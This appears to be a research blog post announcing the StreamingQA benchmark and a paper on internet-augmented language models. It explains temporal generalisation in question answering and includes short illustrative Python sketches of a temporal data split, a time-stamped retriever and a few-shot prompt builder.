Adaptation to new knowledge in parametric and semi-parametric models
December 22, 2024


Many recent successes in language models (LMs) have been achieved within a ‘static paradigm’, where the focus is on improving performance on benchmarks created without considering the temporal aspect of data: for instance, answering questions about events that the model could have learned about during training, or evaluating on text sub-sampled from the same period as the training data. However, our language and knowledge are dynamic and ever evolving. Therefore, to enable a more realistic evaluation of question-answering models, and the next leap in performance, it’s essential to ensure they are flexible and robust when encountering new and unseen data.

Figure 1. We evaluate our models on unseen language and knowledge, seen here using questions about events in 2020, while the model has been trained on data up until the end of 2019.

In 2021, we released Mind the Gap: Assessing Temporal Generalization in Neural Language Models and the dynamic language modelling benchmarks for WMT and arXiv to facilitate language model evaluation that takes temporal dynamics into account. In that paper, we highlighted the issues that current state-of-the-art large LMs face with temporal generalisation and found that knowledge-intensive tokens take a considerable performance hit.
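To make this evaluation setup concrete, the sketch below illustrates the kind of temporal split involved: training documents come from before a cutoff date and evaluation documents from after it, so the evaluation text contains language and knowledge the model has never seen. This is a minimal illustration rather than the paper’s actual pipeline, and the cutoff date simply mirrors the example in Figure 1.

from datetime import date

# Minimal illustration (not the paper's code): split time-stamped documents into
# a training set from before a cutoff date and an evaluation set from after it,
# so the evaluation text contains language and knowledge unseen during training.
CUTOFF = date(2019, 12, 31)

def temporal_split(documents):
    """documents: list of (publication_date, text) pairs."""
    train = [text for published, text in documents if published <= CUTOFF]
    evaluation = [text for published, text in documents if published > CUTOFF]
    return train, evaluation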

Today, we’re releasing two papers and a new benchmark that further advance research on this topic. In StreamingQA: A Benchmark for Adaptation to New Knowledge over Time in Question Answering Models, we study the downstream task of question answering on our newly proposed benchmark, StreamingQA: we want to understand how parametric and retrieval-augmented, semi-parametric question-answering models adapt to new information, in order to answer questions about new events. In Internet-augmented language models through few-shot prompting for open-domain question answering, we explore the power of combining a few-shot prompted large language model with Google Search as a retrieval component. In doing so, we aim to improve the model’s factuality, while making sure it has access to up-to-date information for answering a diverse set of questions.

StreamingQA: A Benchmark for Adaptation to New Knowledge over Time in Question Answering Models

The knowledge and language understanding of models is commonly evaluated through question answering (QA) on static snapshots of knowledge, such as Wikipedia. To study how semi-parametric QA models and their underlying parametric LMs adapt to evolving knowledge, we constructed the new large-scale benchmark, StreamingQA, with human-written and automatically generated questions asked on a given date, to be answered from 14 years of time-stamped news articles (see Figure 2). We show that parametric models can be updated without full retraining, while avoiding catastrophic forgetting. For semi-parametric models, adding new articles into the search space allows for rapid adaptation; however, models with an outdated underlying LM underperform those with a retrained LM.
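As an illustration of the semi-parametric side of this setup, the sketch below shows how a search space of time-stamped articles can be extended with new documents without retraining, and how retrieval can be restricted to articles published before the date a question was asked. It is a minimal sketch using a simple TF-IDF retriever; the class and field names are illustrative assumptions, not the benchmark’s actual implementation.

from dataclasses import dataclass
from datetime import date

from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity

@dataclass
class Article:
    published: date  # publication time stamp of the news article
    text: str

class TimestampedSearchSpace:
    """Toy search space of time-stamped articles for a semi-parametric QA model."""

    def __init__(self):
        self.articles = []

    def add_articles(self, new_articles):
        # Adapting to new knowledge only requires extending the search space;
        # the underlying LM is not retrained here.
        self.articles.extend(new_articles)

    def retrieve(self, question, asked_on, k=5):
        # Only articles published on or before the question date are eligible,
        # mirroring the "question asked on a given date" setup.
        eligible = [a for a in self.articles if a.published <= asked_on]
        if not eligible:
            return []
        vectorizer = TfidfVectorizer()
        doc_matrix = vectorizer.fit_transform([a.text for a in eligible])
        scores = cosine_similarity(vectorizer.transform([question]), doc_matrix)[0]
        ranked = sorted(zip(scores, eligible), key=lambda pair: pair[0], reverse=True)
        return [article for _, article in ranked[:k]]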

Figure 2. Example questions from the StreamingQA benchmark.

Internet-augmented language models through few-shot prompting for open-domain question answering

We’re aiming to capitalise on the unique few-shot capabilities offered by large-scale language models to overcome some of their challenges with respect to grounding in factual and up-to-date information. Motivated by semi-parametric LMs, which ground their decisions in externally retrieved evidence, we use few-shot prompting to learn to condition LMs on information returned from the web using Google Search, a broad and constantly updated knowledge source. Our approach does not involve fine-tuning or learning additional parameters, which makes it applicable to virtually any language model. And indeed, we find that LMs conditioned on the web surpass the performance of closed-book models of similar, or even larger, model size in open-domain question answering.
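The sketch below shows the general shape of this approach: retrieve evidence from the web for a question, prepend a few in-context examples, and let the LM condition on the evidence purely through the prompt. The web_search and lm_generate callables are hypothetical placeholders standing in for a search API and a large language model; this is an illustrative sketch under those assumptions, not the paper’s implementation.

# Illustrative sketch only: web_search and lm_generate are hypothetical callables
# standing in for a search API (e.g. Google Search) and a large language model.
# No parameters are fine-tuned; the LM conditions on the evidence via the prompt.

FEW_SHOT_EXAMPLES = [
    # (evidence, question, answer) triples used purely as in-context examples.
    ("Paris is the capital and most populous city of France.",
     "What is the capital of France?",
     "Paris"),
]

def build_prompt(evidence_snippets, question):
    """Format the few-shot examples, then the retrieved evidence and the new question."""
    parts = []
    for evidence, q, a in FEW_SHOT_EXAMPLES:
        parts.append("Evidence: %s\nQuestion: %s\nAnswer: %s\n" % (evidence, q, a))
    parts.append("Evidence: %s\nQuestion: %s\nAnswer:" % (" ".join(evidence_snippets), question))
    return "\n".join(parts)

def answer_open_domain(question, web_search, lm_generate, k=3):
    """Ground the answer in up-to-date web evidence rather than model parameters alone."""
    snippets = web_search(question)[:k]  # retrieve current evidence from the web
    prompt = build_prompt(snippets, question)
    return lm_generate(prompt)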


